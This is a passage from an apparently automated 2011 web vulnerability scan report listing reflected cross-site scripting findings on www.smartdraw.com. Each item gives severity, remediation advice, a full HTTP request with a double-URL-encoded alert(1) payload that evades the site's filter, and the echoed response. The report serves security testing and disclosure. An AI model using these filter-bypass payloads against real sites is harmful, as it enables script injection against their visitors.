There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloadsb2601%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522cc75ed19a87/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gjwvvma5ouzgwz45mccvo0yz; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloadsb2601"style="x:expression(alert(1))"cc75ed19a87/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.145. http://www.smartdraw.com/downloads/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 was submitted in the REST URL parameter 2. This input was echoed as 53118"style="x:expression(alert(1))"c23085e6306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads/53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=slhjyjfmrcmjlrjjdpmdykfr; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8753
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/53118"style="x:expression(alert(1))"c23085e6306/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.146. http://www.smartdraw.com/downloads/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db was submitted in the REST URL parameter 2. This input was echoed as ba1e3"style="x:expression(alert(1))"9c5fd0e07db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /downloads/x22ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=jpp44c45no3vndyg0eiqfdaq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8774
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/x22ba1e3"style="x:expression(alert(1))"9c5fd0e07db/" rel="nofollow" target="_blank">
...[SNIP]...

1.147. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c9a5"style="x:expression(alert(1))"c2aa39074d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads/x22?5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ssgwag55ef2suzf5q24jnl45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8795
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/x22/?5c9a5"style="x:expression(alert(1))"c2aa39074d2=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.148. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /downloads/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43ce2"style="x:expression(alert(1))"09bdff38fc4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /downloads/x22?43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/
Set-Cookie: ASP.NET_SessionId=tew4y345qibicu55t1rjfuqe; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8795
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/downloads/x22/?43ce2"style="x:expression(alert(1))"09bdff38fc4=1" rel="nofollow" target="_blank">
...[SNIP]...

1.149. http://www.smartdraw.com/examples/charts/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /examples/charts/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44 was submitted in the REST URL parameter 1. This input was echoed as 94da6"style="x:expression(alert(1))"861bf406f44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44/charts/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3yzxhc55ehds33jqb4uatink; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/94da6"style="x:expression(alert(1))"861bf406f44/charts/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px;
...[SNIP]...

1.150. http://www.smartdraw.com/examples/charts/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /examples/charts/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3 was submitted in the REST URL parameter 1. This input was echoed as a48df"style="x:expression(alert(1))"d7925e086c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /examplesa48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3/charts/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ty0lqe55q5mcnibk2sdorqzz; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8816
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/examplesa48df"style="x:expression(alert(1))"d7925e086c3/charts/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.151. http://www.smartdraw.com/product/reviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498 was submitted in the REST URL parameter 1. This input was echoed as 4a543"style="x:expression(alert(1))"ac716871498 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498/reviews HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:31 GMT
Content-Length: 8739
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3c4tc255quiohy55truamgmu; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/4a543"style="x:expression(alert(1))"ac716871498/reviews/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; hei
...[SNIP]...

1.152. http://www.smartdraw.com/product/reviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1 was submitted in the REST URL parameter 1. This input was echoed as 7bfab"style="x:expression(alert(1))"fd877cbaba1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1/reviews HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=irozqj45lpljwj55wgoccn55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8788
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product7bfab"style="x:expression(alert(1))"fd877cbaba1/reviews/" rel="nofollow" target="_blank">
...[SNIP]...

1.153. http://www.smartdraw.com/product/reviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339 was submitted in the REST URL parameter 1. This input was echoed as cc399"><script>alert(1)</script>aa008f34339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0vufwvz10dn1v0up3yasccey; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8900
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/cc399"><script>alert(1)</script>aa008f34339/reviews/?id=349540/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overfl
...[SNIP]...

1.154. http://www.smartdraw.com/product/reviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d was submitted in the REST URL parameter 1. This input was echoed as 7aea0"><script>alert(1)</script>c7ddeeb9a3d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1fckz3ilanwcrr45tvw5eu55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product7aea0"><script>alert(1)</script>c7ddeeb9a3d/reviews/?id=349540/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

1.155. http://www.smartdraw.com/product/reviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a was submitted in the REST URL parameter 2. This input was echoed as f5bf0"><script>alert(1)</script>a7aeb62331a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/reviewsf5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b4ntfe451a35d0z3actuq255; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/reviewsf5bf0"><script>alert(1)</script>a7aeb62331a/?id=349540/x22/x3eSmartDraw" rel="nofollow" target="_blank">
...[SNIP]...

1.156. http://www.smartdraw.com/product/reviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 was submitted in the REST URL parameter 2. This input was echoed as 6bd2b"style="x:expression(alert(1))"f1b2d917b08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

